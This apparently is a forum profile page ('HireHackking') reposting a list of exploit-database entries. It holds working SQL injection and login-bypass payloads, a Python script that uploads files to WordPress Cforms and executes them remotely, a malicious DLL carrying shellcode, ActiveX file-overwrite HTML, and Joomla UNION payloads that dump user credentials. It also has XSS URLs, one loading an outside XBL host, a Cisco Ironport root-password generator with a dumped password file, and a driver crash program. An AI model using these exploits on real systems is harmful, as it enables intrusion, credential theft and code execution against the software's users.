Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    ecommerceMajor - SQL Injection / Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    ################################################################################################## #Exploit Title : ecommercemajor ecommerce CMS SQL Injection and Authentication bypass #Author : Manish Kishan Tanwar #Home page Link : https://github.com/xlinkerz/ecommerceMajor #Date : 22/01/2015 #Discovered at : IndiShell Lab #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti,Kishan Singh and ritu rathi #email : manish.1046@gmail.com ################################################################################################## //////////////////////// /// Overview: //////////////////////// ecommercemajor is the php based CMS for ecommerce portal /////////////////////////////// // Vulnerability Description: /////////////////////////////// SQL injection vulnerability:- ============================== in file product.php data from GET parameter 'productbycat' is not getting filter before passing into SQL query and hence rising SQL Injection vulnerability --------------------- $getallproduct="select * from purchase where status='enable' and catid=$_GET[productbycat] order by id desc"; --------------------- POC http://127.0.0.1/ecommercemajor/product.php?productbycat=SQLI Authentication Bypass:- ============================== file index.php under directory __admin has SQL injection vulnerability parameter username and password suppliedin post parameter for checking valid admin username and password is not getting filter before passing into SQL query which arise authentication bypass issue. vulnerable code is ------------------- if(isset($_POST[login])) { $check="select * from adminlogin where username='$_POST[username]' and password='$_POST[username]'"; $checkresult=mysql_query($check); $checkcount=mysql_num_rows($checkresult); if($checkcount>0) { $checkrow=mysql_fetch_array($checkresult); $_SESSION[adminname]=$checkrow[adminname]; $_SESSION[adminloginstatus]="success"; echo "<script>window.location='home.php';</script>"; } -------------------- POC open admin panel http://127.0.0.1/ecommercemajor/__admin/ username: ' or '1337'='1337 password: ' or '1337'='1337 --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das ############################################################################################# --==[[Love to]]==-- #Kishan Tanwar,Mrs. Ritu Rathi,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3
  2. HireHackking

    WordPress Plugin Cforms 14.7 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Remote Code Execution via Unauthorised File upload in Cforms 14.7 # Date: 2015-01-19 # Exploit Author: Zakhar # Vendor Homepage: https://wordpress.org/plugins/cforms2/ # Software Link: https://downloads.wordpress.org/plugin/cforms2.zip # Version: 14.7 # Tested on: Wordpress 4.0 # CVE : 2014-9473 import os import requests import re import base64 import sys from lxml import etree from optparse import OptionParser def main(): print 'Cforms II File Upload + Remote Code Execution\n' text = 'Test text' text_mail = 'test@mail.com' parser = OptionParser() parser.add_option("-f", "--file", dest="file", help="file to upload", default = "itest.php", metavar="FILE") parser.add_option("-i", "--max-iterations", dest="iterations", help="Numbe of fields to iterate", default = "10") parser.add_option("-b", "--upload-file-name-bruteforce", dest="brute", help="Uploaded file name brute force", default = "10") parser.add_option("-n", "--cforms-form-number", dest="number", help="Cforms form number", default = "") parser.add_option("-c", "--cforms-home-dir", dest="home", help="Cforms form home dir", default = "/wp-content/plugins/cforms2/") parser.add_option("-u", "--url", dest="url", help="vulnerable url with contact form, example: http://127.0.0.1/Contact/") (opt, args) = parser.parse_args() options = opt.__dict__ if not opt.url: # if url is not given parser.error('URL not given') if not opt.file: parser.error('file not given') filename = options["file"] if os.path.isfile(filename) is not True: print 'No such file '+filename return 0 url = options['url'] home = options["home"] i = options["iterations"] n = options["number"] b = options["brute"] s = requests.Session() r = s.get(url) if r.status_code != requests.codes.ok: print 'Error: website not found.' return 0 tree = etree.HTML(r.text) # get cforms id if n is "": for x in xrange(2,10): for node in tree.xpath('//*[@id="cforms'+str(x)+'form"]'): if node is not None: n = str(x) break print 'Cforms form number is <'+n+'>' hidden = ['cf_working'+n,'cf_failure'+n,'cf_codeerr'+n,'cf_customerr'+n,'cf_popup'+n] fields = ['cf'+n+'_field_'+str(x) for x in xrange(1,int(i)+1)] required = {'sendbutton'+n:'1'} for f in fields: for node in tree.xpath('//*[@id="' + f + '"]'): if node is not None: if 'fldrequired' in node.get('class'): if 'fldemail' in node.get('class'): required[f] = text_mail else: required[f] = text for h in hidden: for node in tree.xpath('//*[@id="' + h + '"]'): if node is not None: required[h] = node.get('value') for node in tree.xpath('//*[@id="cforms_captcha'+n+'"]'): if node is not None: print 'Error: Cforms uses captcha. Sorry, you have to exploit it manually.' return 0 files = {'cf_uploadfile'+n+'[]':('wow.php',open(filename))} r = s.post(url,data=required,files=files) if r.status_code != requests.codes.ok: print 'Error: post error.' print r.status_code return 0 else: url1 = url + home + 'noid-wow.php' flag = 0 if s.get(url1).status_code != requests.codes.ok: for l in xrange(1,int(b)): url1 = url + home + str(l) + '-wow.php' print url1 if s.get(url1).status_code == requests.codes.ok: flag = 1 break else: flag = 1 if flag == 1: print "Succes! Uploaded file: " + url1 else: print "Uploaded file not found. Try to increase -b flag or change upload dir. 14.6.3 version and above use wordpress upload folder" main()
  3. HireHackking

    LeadTools Imaging LEADSmtp - ActiveX Control 'SaveMessage()' Insecure Method

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48408/info LEADTOOLS Imaging LEADSmtp ActiveX control is prone to a vulnerability caused by an insecure method. Successfully exploiting this issue will allow attackers to create or overwrite files within the context of the affected application (typically Internet Explorer) that uses the ActiveX control. Attackers may execute arbitrary code with user-level privileges. <html> <object classid='clsid:0014085F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object> <input language=VBScript onclick=Boom() type=button value="Exploit"> <script language = 'vbscript'> Sub Boom() arg1="FilePath\Filename_to_overwrite" arg2=True target.SaveMessage arg1 ,arg2 End Sub </script> </html>
  4. HireHackking

    xAurora 10.00 - 'RSRC32.dll' DLL Loading Arbitrary Code Execution

    HireHackking posted a blog entry in Hacker Technology
    /* source: https://www.securityfocus.com/bid/48432/info xAurora is prone to a vulnerability that lets attackers execute arbitrary code. An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. */ #include <windows.h> #include <stdlib.h> #include <string.h> char shellcode[]="\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00" "\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56" "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63" "\x2e\x65\x78\x65\x00"; int xAuroraPwnage() { int *ret; ret=(int *)&ret+2; (*ret)=(int)shellcode; MessageBox(0, "[+] xAurora Pwned By Zer0 Thunder !", "Not so Secured Browser", MB_OK); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { xAuroraPwnage(); return 0; }
  5. HireHackking

    Nodesforum - '_nodesforum_node' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48451/info Nodesforum is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. http://www.example.com/?_nodesforum_node=u1'
  6. HireHackking

    Joomla! Component com_morfeoshow - 'idm' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48452/info The 'com_morfeoshow' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. http://www.example.com/index.php?option=com_morfeoshow&task=view&gallery=1&Itemid=114&Itemid=114&idm=1015+and+1=0+union+select+1,2,concat%28username,0x3a,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+jos_users+--+
  7. HireHackking

    Mambo 4.6.x - Multiple Cross-Site Scripting Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48455/info Mambo CMS is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. Mambo CMS 4.6.5 is vulnerable; other versions may also be affected; http://www.example.com/mambo/index.php?option=com_content&task=%22%20style=width:1000px;height:1000px;top:0;left:0;position:absolute%20onmouseover=alert%28/XSS/%29%20&id=3&Itemid=32 http://www.example.com/mambo/administrator/index2.php?option=com_menumanager&task=edit&hidemainmenu=1&menu=Move+your+mouse+here%22%20style=position:absolute;width:1000px;height:1000px;top:0;left:0;%20onmouseover=alert%28/XSS/%29%20 http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS http://www.example.com/mambo/administrator/index2.php?option=com_menus&menutype=xss"%20%20%20style=background-image:url('javascript:alert(/XSS/)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS http://www.example.com/mambo/administrator/index2.php?limit=10&order%5b%5d=11&boxchecked=0&toggle=on&search=simple_search&task=&limitstart=0&cid%5b%5d=on&zorder=c.ordering+DESC"><script>alert(/XSS/)</script>&filter_authorid=62&hidemainmenu=0&option=com_typedcontent http://www.example.com/mambo/administrator/index2.php?limit=10&boxchecked=0&toggle=on&search=xss"><script>alert(/XSS/)</script>&task=&limitstart=0&hidemainmenu=0&option=com_comment http://www.example.com/mambo/administrator/index2.php?option=com_modules&client=%27%22%20onmouseover=alert%28/XSS/%29%20a=%22%27 http://www.example.com/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20style%3dx%3aexpression(alert(/XSS/))%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 http://www.example.com/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20style%3d-moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml%23xss)%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 http://www.example.com/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20%20style=background-image:url('javascript:alert(0)');width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2 http://www.example.com/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;dis http://www.example.com/mambo/administrator/index2.php?option=com_categories&section=com_weblinks"%20%20style=background-image:url(javascript:alert(0));width:1000px;height:1000px;display:block;%20x=%20XSSSSSSSS&task=editA&hidemainmenu=1&id=2
  8. HireHackking

    Ubisoft CoGSManager ActiveX Control 1.0.0.23 - 'Initialize()' Method Stack Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48462/info Ubisoft CoGSManager ActiveX control is prone to a remote stack-based buffer-overflow vulnerability because the application fails to properly bounds check user-supplied input. Attackers can exploit this issue to execute arbitrary code within the context of an application (typically Internet Explorer) that uses the ActiveX control. Failed exploit attempts will result in a denial-of-service condition. Ubisoft CoGSManager ActiveX control 1.0.0.23 is vulnerable. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35885.zip
  9. HireHackking

    Sybase Advantage Server 10.0.0.3 - 'ADS' Process Off-by-One Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48464/info Sybase Advantage Server is prone to an off-by-one buffer-overflow vulnerability. Attackers may exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts may result in a denial-of-service condition. Sybase Advantage Server 10.0.0.3 is vulnerable; other versions may also be affected. https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35886.zip ####################################################################### Luigi Auriemma Application: Sybase Advantage Server http://www.sybase.com/products/databasemanagement/advantagedatabaseserver Versions: <= 10.0.0.3 Platforms: Windows, NetWare, Linux Bug: off-by-one Exploitation: remote, versus server Date: 27 Jun 2011 (found 29 Oct 2010) Author: Luigi Auriemma e-mail: aluigi@autistici.org web: aluigi.org ####################################################################### 1) Introduction 2) Bug 3) The Code 4) Fix ####################################################################### =============== 1) Introduction =============== From vendor's website: "Advantage Database Server is a full-featured, easily embedded, client-server, relational database management system that provides you with Indexed Sequential Access Method (ISAM) table-based and SQL-based data access." ####################################################################### ====== 2) Bug ====== By default the Advantage server (ADS process) listens on the UDP and TCP ports 6262 and optionally is possible to specify also a so called "internet port" for non-LAN connections. The problem is enough unusual and affects the code that handles a certain type of packets on the UDP port. In short the server does the following: - it uses memcpy to copy the data from the packet into a stack buffer of exactly 0x2b8 bytes (handled as 0x2b9 bytes) - later this data is handled as a string but no final NULL byte delimiter is inserted - there is also an off-by-one bug since one byte overwrites the lower 8bit value of a saved element (a stack pointer 017bff??) - after this buffer are located some pushed elements and obviously the return address of the function - it calls the OemToChar API that changes some bytes of the buffer (like those major than 0x7f) till it reaches a 0x00 that "luckily" is after the return address - so also the return address gets modified, exactly from 0084cb18 to 00e42d18 that ironically is a valid stack frame somewhat related to the starting of the service - the data inside this stack address doesn't seems changeable from outside and has tons of 0x00 bytes that in this case act like NOPs till the zone around 00ebf05b where are located some pushed elements - the EBX register contains two bytes of the attacker's data and EBP points to such data the following is a resume of these operations: 017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 FF 7B aaaaaaaaaaaaaa�{ 017BF67B 01 99 26 C1 71 BC F6 7B 01 18 CB 84 00 00 00 00 .�&�q��{..˄.... |---------| original return address 0084B81D |. FF15 DC929000 CALL DWORD PTR DS:[<&USER32.OemToCharA>] 017BF66B 61 61 61 61 61 61 61 61 61 61 61 61 61 61 A0 7B aaaaaaaaaaaaaa�{ 017BF67B 01 D6 26 2D 71 2B F7 7B 01 18 2D E4 00 00 00 00 .�&-q+�{..-�.... |---------| new return address 00E42D18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00E42D28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ ... 00EBF04B 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00EBF05B 00 99 78 82 7C 4A EC 82 7C 20 00 00 00 A0 F0 EB .�x�|J��| ...��� 00EBF06B 00 A0 F0 EB 00 00 00 00 00 68 F1 EB 00 01 00 00 .���.....h��.... 00EBF07B 00 5C F1 EB 00 D1 0F E7 77 A0 F0 EB 00 00 00 00 .\��.�.�w���.... 00EBF08B 00 51 02 02 00 EC 0F E7 77 00 D0 FD 7F 00 00 00 .Q...�.�w.��... 00EBF09B 00 01 00 00 00 18 00 34 00 02 00 00 00 7C 0A 00 .......4.....|.. 00EBF0AB 00 14 0D 00 00 1C 75 17 00 00 00 00 00 00 00 00 ......u......... 00EBF0BB 00 51 02 02 00 08 00 00 C0 00 00 00 00 00 00 00 .Q......�....... the code flow usually arrives till 00ebf0ab or other addresses close to it depending by the data saved there when the service started. Now for exploiting this vulnerability would be required the presence of a "jmp ebp" or "call ebp" or a sequence of instructions with a similar result in the 00ebf05b zone which looks like an enough rare event. I have not tested the Linux and NetWare platforms so I don't know if the problem exists also there and if there are more chances of exploiting it. ####################################################################### =========== 3) The Code =========== http://aluigi.org/testz/udpsz.zip http://aluigi.org/poc/ads_crc.zip udpsz -C 0012 -L ads_crc.dll -b 0x61 SERVER 6262 0x592 ####################################################################### ====== 4) Fix ====== No fix. UPDATE: vendor has fixed the bug in version 10.10.0.16 released in July 2011: http://devzone.advantagedatabase.com/dz/content.aspx?key=44&id=ef0915fb-44c2-fe4b-ac26-9ed3359cffff #######################################################################
  10. HireHackking

    Joomla! Component Minitek FAQ Book 1.3 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    source: https://www.securityfocus.com/bid/48223/info Joomla Minitek FAQ Book is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Joomla Minitek FAQ Book 1.3 is vulnerable; other versions may also be affected. http://www.example.com/demo16/faq-book?view=category&id=-7+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+jos_users--
  11. HireHackking

    Cisco Ironport Appliances - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    /* Cisco Ironport Appliances Privilege Escalation Vulnerability Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.5.5-280 Cisco Ironport WSA - AsyncOS 8.0.5-075 Cisco Ironport SMA - AsyncOS 8.3.6-0 Date: 22/05/2014 Credits: Glafkos Charalambous CVE: Not assigned by Cisco Disclosure Timeline: 19-05-2014: Vendor Notification 20-05-2014: Vendor Response/Feedback 27-08-2014: Vendor Fix/Patch 24-01-2015: Public Disclosure Description: Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation. By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations. The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support. Vendor Response: As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account. [SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password. [GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access. [SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528 Technical Details: By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access. This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service. Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance. Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc. PoC: Enable Service Account ---------------------- root@kali:~# ssh -lenablediag 192.168.0.158 Password: Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance Available Commands: help -- View this text. quit -- Log out. service -- Enable or disable access to the service system. network -- Perform emergency configuration of the diagnostic network interface. clearnet -- Resets configuration of the diagnostic network interface. ssh -- Configure emergency SSH daemon on the diagnostic network interface. clearssh -- Stop emergency SSH daemon on the diagnostic network interface. tunnel -- Start up tech support tunnel to IronPort. print -- Print status of the diagnostic network interface. reboot -- Reboot the appliance. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently disabled. ironport.example.com> service Service Access is currently disabled. Enabling this system will allow an IronPort Customer Support representative to remotely access your system to assist you in solving your technical issues. Are you sure you want to do this? [Y/N]> Y Enter a temporary password for customer support to use. This password may not be the same as your admin password. This password will not be able to be used to directly access your system. []> cisco123 Service access has been ENABLED. Please provide your temporary password to your IronPort Customer Support representative. S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4 Service Access currently ENABLED (0 current service logins) ironport.example.com> Generate Service Account Password --------------------------------- Y:\Vulnerabilities\cisco\ironport>woofwoof.exe Usage: woofwoof.exe -p password -s serial -p <password> | Cisco Service Temp Password -s <serial> | Cisco Serial Number -h | This Help Menu Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4 Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019 F508A4 Service Password: b213c9a4 Login to the appliance as Service account with root privileges -------------------------------------------------------------- root@kali:~# ssh -lservice 192.168.0.158 Password: Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10 Copyright (c) 2001-2013, Cisco Systems, Inc. AsyncOS 8.5.5 for Cisco C100V build 280 Welcome to the Cisco C100V Email Security Virtual Appliance # uname -a FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64 # cat /etc/master.passwd # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $ root:*:0:0::0:0:Mr &:/root:/sbin/nologin service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin operator:*:2:5::0:0:System &:/:/sbin/nologin bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <ctype.h> #include "md5.h" #include "getopt.h" #define MAX_BUFFER 128 #define SECRET_PASS "woofwoof" void usage(char *name); void to_lower(char *str); void fuzz_string(char *str); int main(int argc, char *argv[]) { if (argc < 2) { usage(argv[0]); } int opt; int index; char *temp_pass = { 0 }; char *serial_no = { 0 }; char *secret_pass = SECRET_PASS; char service[MAX_BUFFER] = { 0 }; unsigned char digest[16] = { 0 }; while ((opt = getopt(argc, argv, "p:s:h")) != -1) { switch (opt) { case 'p': temp_pass = optarg; break; case 's': serial_no = optarg; break; case 'h': usage(argv[0]); break; default: printf_s("Wrong Argument: %s\n", argv[1]); break; } } for (index = optind; index < argc; index++) { usage(argv[0]); exit(0); } if (temp_pass == NULL || serial_no == NULL) { usage(argv[0]); exit(0); } if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service))) { to_lower(serial_no); fuzz_string(temp_pass); strcpy_s(service, sizeof(service), temp_pass); strcat_s(service, sizeof(service), serial_no); strcat_s(service, sizeof(service), secret_pass); MD5_CTX context; MD5_Init(&context); MD5_Update(&context, service, strlen(service)); MD5_Final(digest, &context); printf_s("Service Password: "); for (int i = 0; i < sizeof(digest)-12; i++) printf("%02x", digest[i]); } return 0; } void fuzz_string(char *str) { while (*str){ switch (*str) { case '1': *str = 'i'; break; case '0': *str = 'o'; break; case '_': *str = '-'; break; } str++; } } void to_lower(char *str) { while (*str) { if (*str >= 'A' && *str <= 'Z') { *str += 0x20; } str++; } } void usage(char *name) { printf_s("\nUsage: %s -p password -s serial\n", name); printf_s(" -p <password> | Cisco Service Temp Password\n"); printf_s(" -s <serial> | Cisco Serial Number\n"); printf_s(" -h | This Help Menu\n"); printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name); exit(0); }
  12. HireHackking

    RedaxScript 2.1.0 - Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Privilege Escalation in RedaxScript 2.1.0 # Date: 11-05-2014 # Exploit Author: shyamkumar somana # Vendor Homepage: http://redaxscript.com/ # Version: 2.1.0 # Tested on: Windows 8 #Privilege Escalation in RedaxScript 2.1.0 RedaxScript 2.1.0 suffers from a privilege Escalation vulnerability. The issue occurs because the application fails to properly implement access controls. The application also fails to perform proper sanity checks on the user supplied input before processing it. These two flaws led to a vertical privilege escalation. This can be achieved by a simply tampering the parameter values. An attacker can exploit this issue to gain elevated privileges to the application. *Steps to reproduce the instance:* · login as a non admin user · Go to account and update the account. · intercept the request and add “*groups[]=1*” to the post data and submit the request · Log out of the application and log in again. You can now browse the application with admin privileges. This vulnerability was addressed in the following commit. https://github.com/redaxmedia/redaxscript/commit/bfe146f98aedb9d169ae092b49991ed1b3bc0860?diff=unified *Timeline*: 09-26-2014: Issue identified 09-27-2014: Discussion with the vendor 10-27-2014: Issue confirmed 11-05-2014: Patch released. Author: Shyamkumar Somana Vendor Homepage: http://redaxscript.com/download Version: 2.1.0 Tested on: Windows 7 -- [image: --] shyam kumar [image: http://]about.me/shyamkumar.somana <http://about.me/shyamkumar.somana?promo=email_sig> Shyamkumar Somana | +91 89513 38625 | twitter.com/0xshyam | in.linkedin.com/in/sshyamkumar/ |
  13. HireHackking

    Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service

    HireHackking posted a blog entry in Hacker Technology
    /* Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS Date - 19th January 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - https://www.malwarebytes.org Tested Version - 1.03.1.1220, 1.04.1.1012 Driver Version - no version set - mbae.sys Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1 OSVDB - http://www.osvdb.org/show/osvdb/114249 CVE ID - CVE-2014-100039 Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/ Fixed version - 1.05 Fixed driver ver - no version set */ #include <stdio.h> #include <windows.h> #define BUFSIZE 25 int main(int argc, char *argv[]) { HANDLE hDevice; char devhandle[MAX_PATH]; DWORD dwRetBytes = 0; BYTE sizebytes[4] = "\xff\xff\xff\x00"; BYTE *inbuffer; printf("-------------------------------------------------------------------------------\n"); printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n"); printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver"); inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); memset(inbuffer, 0x41, BUFSIZE); memcpy(inbuffer, sizebytes, sizeof(sizebytes)); printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if(hDevice == INVALID_HANDLE_VALUE) { printf("\n[-] Open %s device failed\n\n", devhandle); return -1; } else { printf("\n[+] Open %s device successful", devhandle); } printf("\n[~] Press any key to DoS . . ."); getch(); DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL); printf("\n[+] DoS buffer sent\n\n"); CloseHandle(hDevice); return 0; }
  14. HireHackking

    ManageEngine (Multiple Products) - (Authenticated) Arbitrary File Upload (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
